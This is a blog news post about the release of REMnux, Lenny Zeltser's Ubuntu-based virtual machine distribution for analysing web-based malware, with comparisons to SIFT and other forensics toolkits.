A security consultant has released a Ubuntu-based Linux distribution specifically designed to help analyze and re-engineer malware. Lenny Zeltser on Thursday released REMnux on Sourceforge and it has already been downloaded nearly 2,000 times.
REMnux is not a brand-new distro built from scratch but really a stripped down version of Ubuntu distributed loaded on a VMware virtual machine and stuffed with hand-picked analysis tools.
So, you run the suspect code on your forensics system to see what happens and REMnux helps you determine what type of nasty game the code plays.
Zeltser said he specifically built REMnux to be more focused on Web-based malware, rather than including every possible tool. According to the ThreatPost blog:
But it's not intended as a be-all-end-all tool. It isn't geared to analyze Windows bugs, Zeltser explains. He recommends the Zero Wine project for that. It also isn't the only Linux-based malware analysis toolkit. He notes that a more full-featured one is the SANS Investigative Forensic Toolkit (SIFT) Workstation. Cert also offers the CERT Linux Forensics Tools Repository, based on Fedora, billed as a collection of tools useful for security forensics. There are other popular tools for reverse engineering Windows- and Linux-based code specifically, such as IDA Pro. (I freely admit that I don't know enough about security forensics to understand how apples-to-oranges these tools are. If you have other favorites, please share.)
I asked Zeltser via Twitter why he created REMnux when these other tools, particularly SANs own SIFT are already available. He replied, "SIFT is great, but can be overwhelming to a person getting started with malware analysis. We may merge REMnux into SIFT some day."
For all that it isn't, Zeltser's Ubuntu OS has still been earning praise in the security blogosphere. This is in part because Zeltser is a well-known malware analysis teacher for the SANs Institute as well as an author and an incident handler at the Internet Storm Center. He also leads the security consulting practice at Savvis.
Download the REMnux here.
Like this? Here's more:
- All of today's open source news and blogs
- Fedora 13 beta released with many goodies for the enterprise
- What's Bilski got to do with open source?
- Marten Mickos says the cloud won't kill open source
- Apple would rather remove app than leave open-source license
- New study says OSS exploited earlier, more often
- Everything you want to know about open source licenses in 500 words or less
- Creating a library of FLOSS Manuals
- Subscribe to all Open Source Subnet bloggers.
Follow Julie Bort on Twitter @Julie188
Follow all Open Source Subnet blog posts on Twitter @OSSubnet
The Source Seeker blog is written by Julie Bort, editor of the Open Source Subnet site as well as the Microsoft Subnet, Cisco Subnet sites. Indeed, Bort is the Online Community Editor for all of Network World. She also writes The Microsoft Update blog. If you have an idea for a blog, or a news tip on open source, Microsoft or Cisco, contact her at firstname.lastname@example.org, 970-482-6454 or follow Julie on Twitter @Julie188.
Open Source Subnet is the independent voice of open source users and is your gateway to daily open source news, blogs, tips and more. Visit the Open Source Subnet home page daily.